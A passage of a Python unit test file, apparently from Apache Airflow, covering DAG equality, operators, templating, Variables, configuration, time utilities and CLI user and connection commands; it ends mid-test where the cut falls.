class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_task_get_template(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
context = ti.get_template_context()
# DEFAULT DATE is 2015-01-01
self.assertEquals(context['ds'], '2015-01-01')
self.assertEquals(context['ds_nodash'], '20150101')
# next_ds is 2015-01-02 as the dag interval is daily
self.assertEquals(context['next_ds'], '2015-01-02')
self.assertEquals(context['next_ds_nodash'], '20150102')
# prev_ds is 2014-12-31 as the dag interval is daily
self.assertEquals(context['prev_ds'], '2014-12-31')
self.assertEquals(context['prev_ds_nodash'], '20141231')
self.assertEquals(context['ts'], '2015-01-01T00:00:00+00:00')
self.assertEquals(context['ts_nodash'], '20150101T000000+0000')
self.assertEquals(context['yesterday_ds'], '2014-12-31')
self.assertEquals(context['yesterday_ds_nodash'], '20141231')
self.assertEquals(context['tomorrow_ds'], '2015-01-02')
self.assertEquals(context['tomorrow_ds_nodash'], '20150102')
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existent",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
# C
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
def test_trigger_dagrun_with_execution_date(self):
utc_now = timezone.utcnow()
run_id = 'trig__' + utc_now.isoformat()
def payload_generator(context, object):
object.run_id = run_id
return object
task = TriggerDagRunOperator(task_id='test_trigger_dagrun_with_execution_date',
trigger_dag_id='example_bash_operator',
python_callable=payload_generator,
execution_date=utc_now,
dag=self.dag)
task.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
dag_runs = models.DagRun.find(dag_id='example_bash_operator',
run_id=run_id)
self.assertEquals(len(dag_runs), 1)
dag_run = dag_runs[0]
self.assertEquals(dag_run.execution_date, utc_now)
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
from airflow.www_rbac import app as application
configuration.load_test_config()
self.app, self.appbuilder = application.create_app(session=Session, testing=True)
self.app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
settings.configure_orm()
self.session = Session
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_dag_runs(self):
cli.trigger_dag(self.parser.parse_args([
'trigger_dag', 'example_bash_operator', ]))
args = self.parser.parse_args(['list_dag_runs',
'example_bash_operator',
'--no_backfill'])
cli.list_dag_runs(args)
def test_cli_create_user_random_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test1', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@foo.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
def test_cli_create_user_supplied_password(self):
args = self.parser.parse_args([
'create_user', '-u', 'test2', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@apache.org', '-r', 'Viewer', '-p', 'test'
])
cli.create_user(args)
def test_cli_delete_user(self):
args = self.parser.parse_args([
'create_user', '-u', 'test3', '-l', 'doe', '-f', 'jon',
'-e', 'jdoe@example.com', '-r', 'Viewer', '--use_random_password'
])
cli.create_user(args)
args = self.parser.parse_args([
'delete_user', '-u', 'test3',
])
cli.delete_user(args)
def test_cli_list_users(self):
for i in range(0, 3):
args = self.parser.parse_args([
'create_user', '-u', 'user{}'.format(i), '-l', 'doe', '-f', 'jon',
'-e', 'jdoe+{}@gmail.com'.format(i), '-r', 'Viewer',
'--use_random_password'
])
cli.create_user(args)
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.list_users(self.parser.parse_args(['list_users']))
stdout = mock_stdout.getvalue()
for i in range(0, 3):
self.assertIn('user{}'.format(i), stdout)
def test_cli_sync_perm(self):
# test whether sync_perm cli will throw exceptions or not
args = self.parser.parse_args([
'sync_perm'
])
cli.sync_perm(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
self.assertIn(['segment_default', 'segment'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
# Attempt to delete a non-existing connnection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
